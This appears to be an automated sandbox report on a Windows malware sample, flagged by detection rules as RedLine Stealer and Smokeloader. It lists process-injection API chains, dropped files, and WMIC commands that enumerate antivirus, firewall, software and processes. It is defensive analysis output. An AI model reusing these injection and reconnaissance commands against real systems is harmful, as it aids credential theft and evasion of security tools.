      Source: C:\Windows\explorer.exe | Code function: 13_2_003C38B0 NtUnmapViewOfSection,13_2_003C38B0
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00581016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,14_2_00581016
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00581819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,14_2_00581819
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00581A80 NtCreateSection,NtMapViewOfSection,14_2_00581A80
      Source: C:\Windows\explorer.exe | Code function: 17_2_0082355C NtUnmapViewOfSection,17_2_0082355C
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,19_2_02F21016
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F218BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,19_2_02F218BF
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F21B26 NtCreateSection,NtMapViewOfSection,19_2_02F21B26
      Source: C:\Windows\explorer.exe | Code function: 20_2_00EE370C NtUnmapViewOfSection,20_2_00EE370C
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A9AC8
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327ADC0C
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327AA520
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A213C
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327AA778
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A3220
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327AB428
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F2198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_0310B35C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030FC2F9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_03144438
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_0310B97E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_03115F08
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F6E6A
Source: C:\Windows\explorer.exe | Code function: 13_2_003C1E20
Source: C:\Windows\explorer.exe | Code function: 17_2_00822054
Source: C:\Windows\explorer.exe | Code function: 17_2_00822860
Source: C:\Windows\explorer.exe | Code function: 20_2_00EE20F4
Source: C:\Windows\explorer.exe | Code function: 20_2_00EE2A04
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 030F8801 appears 38 times
Source: bCnarg2O62.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@62/14@5/4
Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_005BF894 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A7138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\derhswe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\1D0F.tmp
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: bCnarg2O62.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\9245.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\9245.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="552"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="620"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="628"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="988"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="364"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="356"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="696"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="592"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1044"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1084"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1176"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1200"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1252"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1296"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1316"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1408"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1476"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1488"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1552"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1572"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1652"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1724"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1824"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1840"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1940"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1948"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1956"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2036"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1932"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2064"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2216"::GetOwner
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\bCnarg2O62.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: D805.tmp.12.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: bCnarg2O62.exe | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Users\user\Desktop\bCnarg2O62.exe "C:\Users\user\Desktop\bCnarg2O62.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\derhswe C:\Users\user\AppData\Roaming\derhswe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\derhswe C:\Users\user\AppData\Roaming\derhswe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\1D0F.exe C:\Users\user\AppData\Local\Temp\1D0F.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\jfrhswe C:\Users\user\AppData\Roaming\jfrhswe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\9245.exe C:\Users\user\AppData\Local\Temp\9245.exe
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
